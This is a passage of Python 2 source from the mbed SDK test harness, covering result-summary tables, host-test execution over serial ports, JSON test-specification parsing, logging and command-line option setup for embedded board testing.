pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows target x test result matrix
"""
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.iteritems()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str.split(',')
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
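# For illustration only (hypothetical test IDs): self.test_loop_list_to_dict('MBED_A1=5,MBED_A2=3')
# returns {'MBED_A1': 5, 'MBED_A2': 3}; entries whose loop count is not an integer are skipped.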
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception, e:
resutl_msg = e
result = False
return result, resutl_msg
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target. Test is being invoked afterwards.
"""
data = json.loads(test_spec)
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
# Find a suitable MUT:
mut = None
for id, m in self.muts.iteritems():
if m['mcu'] == data['mcu']:
mut = m
break
if mut is None:
print "Error: No Mbed available: MUT[%s]" % data['mcu']
return None
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
image_dest = mut.get('image_dest') # Image file destination DISK + IMAGE_DEST + BINARY_NAME
images_config = mut.get('images_config') # Available images selection via config file
mobo_config = mut.get('mobo_config') # Available board configuration selection e.g. core selection etc.
copy_method = mut.get('copy_method') # Copy (flash) method declared for this MUT
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, )
image_path = image
if self.db_logger:
self.db_logger.reconnect()
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print single_test_output
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s())
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
elapsed_time = single_testduration # Time of single test case execution after reset
detailed_test_results[test_index] = {
'single_test_result' : single_test_result,
'single_test_output' : single_test_output,
'target_name' : target_name,
'toolchain_name' : toolchain_name,
'test_id' : test_id,
'test_description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print self.print_test_result(single_test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, single_timeout)
# Update database entries for ongoing test
if self.db_logger and self.db_logger.is_connected():
test_type = 'SingleTest'
self.db_logger.insert_test_entry(self.db_logger_build_id,
target_name,
toolchain_name,
test_type,
test_id,
single_test_result,
single_test_output,
elapsed_time,
single_timeout,
test_index)
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
if self.db_logger:
self.db_logger.disconnect()
return (self.shape_global_test_loop_result(test_all_result),
target_name,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
return result
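# For illustration (assuming the TEST_RESULT_* constants are the strings 'OK' and 'FAIL'):
# for test_all_result == ['OK', 'OK', 'FAIL'], shape_test_loop_ok_result_count() returns '2/3'
# and shape_global_test_loop_result() returns 'FAIL' because the loop results are not all equal.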
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also polls for serial port activity from the process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty, _:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
# print "{%s} port:%s disk:%s" % (name, port, disk),
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET
print "Test::Output::Start"
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
# We will update this marker only once to prevent multiple time resets
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print "Test::Output::Finish"
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.iteritems():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JOSN structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
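# For illustration (hypothetical values): self.shape_test_request('LPC1768', './build/test.bin', 'MBED_A1', 10)
# returns a JSON string equivalent to
# {"mcu": "LPC1768", "image": "./build/test.bin", "duration": 10, "test_id": "MBED_A1"}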
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print 'Line %d:\t'%line_no + json_line, # Prints line
if line_no == line:
print ' ' * len('Line %d:'%line_no) + '\t', '-' * (column-1) + '^'
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from the message string of the exception thrown by json.loads()
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
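# For illustration: a typical json.loads() error message such as
# "Expecting ',' delimiter: line 7 column 12 (char 171)" is parsed into [7, 12].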
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print 'JSON file %s parsing failed. Reason: %s' % (json_spec_filename, json_error_msg)
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print 'JSON file %s not opened. Reason: %s'% (json_spec_filename, fileopen_error_msg)
print
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if type(cell_val) == ListType:
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
suffix = 's' if len(toolchain_conflicts[target]) > 1 else ''
result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, suffix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
# Filter out platforms using regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if type(test[col]) == ListType:
col_value = join_delim.join(test[col])
elif test[col] is None:
col_value = "-"
row.append(col_value)
if test['automated'] == True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
step = int(percent_progress / 2) # Scale percentage to bar width (scale: 0 - 50)
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation / 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
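# For illustration: progress_bar(50.0) returns a 50-character bar of 25 '#' characters
# followed by 25 '.' characters; a non-zero saturation inserts a single '|' or '!'
# marker at the saturation point.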
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print single_test.generate_test_summary(test_summary, shuffle_seed)
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows test x toolchain test result matrix
print single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit compliant XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
class TestLogger():
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
or just handles all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def factory_db_logger(db_url):
""" Factory database driver depending on database type supplied in database connection string db_url
"""
if db_url is not None:
from workspace_tools.test_mysql import MySQLDBAccess
connection_info = BaseDBAccess().parse_db_connection_string(db_url)
if connection_info is not None:
(db_type, username, password, host, db_name) = BaseDBAccess().parse_db_connection_string(db_url)
if db_type == 'mysql':
return MySQLDBAccess()
return None
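# For illustration (hypothetical credentials): factory_db_logger('mysql://user:password@127.0.0.1/db_name')
# is expected to return a MySQLDBAccess instance, while an unsupported database type
# in the connection string yields None.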
def detect_database_verbose(db_url):
""" uses verbose mode (prints) database detection sequence to check it database connection string is valid
"""
result = BaseDBAccess().parse_db_connection_string(db_url)
if result is not None:
# Parsing passed
(db_type, username, password, host, db_name) = result
#print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
# Let's try to connect
db_ = factory_db_logger(db_url)
if db_ is not None:
print "Connecting to database '%s'..."% db_url,
db_.connect(host, username, password, db_name)
if db_.is_connected():
print "ok"
print "Detecting database..."
print db_.detect_database(verbose=True)
print "Disconnecting...",
db_.disconnect()
print "done"
else:
print "Database type '%s' unknown"% db_type
else:
print "Parse error: '%s' - DB Url error"% (db_url)
def get_module_avail(module_name):
""" This function returns True if module_name is already impored module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS(mbeds_list):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
m = {'mcu' : mut['platform_name'],
'port' : mut['serial_port'],
'disk' : mut['mount_point'],
'peripherals' : [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
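# For illustration, using the sample board from the comment above: a detected device with
# platform_name 'NUCLEO_F302R8', serial_port u'COM34' and mount_point 'E:' becomes
# {1: {'mcu': 'NUCLEO_F302R8', 'port': u'COM34', 'disk': 'E:', 'peripherals': []}}.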
def get_autodetected_TEST_SPEC(mbeds_list, use_default_toolchain=True, use_supported_toolchains=False, toolchain_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['platform_name']
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter.split(','):
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = optparse.OptionParser()
parser.add_option('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
help='Points to file with test specification')
parser.add_option('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_option("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type="int",
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_option('', '--auto',
dest='auto_detect',
metavar=False,
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
parser.add_option('', '--tc',
dest='toolchains_filter',
help="Toolchain filter for --auto option. Use toolcahins names separated by comma, 'default' or 'all' to select toolchains")
parser.add_option('', '--clean',
dest='clean',
metavar=False,
action="store_true",
help='Clean the build directory')
parser.add_option('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_option('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
help='Test only board internals. Skip peripherals tests and perform common tests.')
parser.add_option('-n', '--test-by-names',
dest='test_by_names',
help='Runs only tests enumerated in this switch')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_option('-c', '--copy-method',
dest='copy_method',
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_option('-r', '--reset-type',
dest='mut_reset_type',
default=None,
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_option('-g', '--goanna-for-tests',
dest='goanna_for_tests',
metavar=False,
action="store_true",
help='Run Goanna static analysis tool for tests (project will be rebuilt)')
parser.add_option('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
metavar=False,
action="store_true",
help='Run Goanna static analysis tool for mbed SDK (project will be rebuilt)')
parser.add_option('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
help='Suppresses display of well-formatted table with test results')
parser.add_option('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
help='Displays well-formatted table with test x toolchain test result per target')
parser.add_option('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_option('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_option("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_option("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_option('', '--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
help='Displays full test specification and MUTs configuration and exits')
parser.add_option('', '--loops',
dest='test_loops_list',
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_option('', '--global-loops',
dest='test_global_loops_value',
help='Set global number of test loops per test. Default value is set 1')
parser.add_option('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops options. Tests until OK result occurs and assumes test passed.')
parser.add_option('-N', '--firmware-name',
dest='firmware_global_name',
help='Set global name for all produced projects. Note, proper file extension will be added by build scripts.')
parser.add_option('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_option('', '--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_option('-f', '--filter',
dest='general_filter_regex',
default=None,
